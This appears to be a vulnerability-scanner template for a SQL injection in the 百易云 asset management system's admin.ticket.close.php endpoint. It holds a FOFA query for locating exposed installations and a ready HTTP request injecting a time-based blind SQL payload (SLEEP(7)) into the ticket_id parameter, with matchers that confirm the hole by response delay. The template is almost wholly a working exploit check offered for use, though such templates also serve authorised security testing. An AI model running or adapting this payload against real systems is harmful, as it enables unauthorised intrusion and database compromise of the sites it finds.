## id: VEID-2025-0112
## name: 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2025
## description: 百易云资产管理系统在admin.ticket.close.php接口下存在sql注入漏洞
## fofa-query: body="不要着急，点此"
## verification: true


GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(7)))OKTO) HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ timeout: 20
#@ condition: and
#@ matcher: status_code == 200
#@ matcher: response_time > 7





# @VEIL-STAMP: 313b09573d87664780f93304ae751b8a714f7b65caa152d5d9fce6089d083111
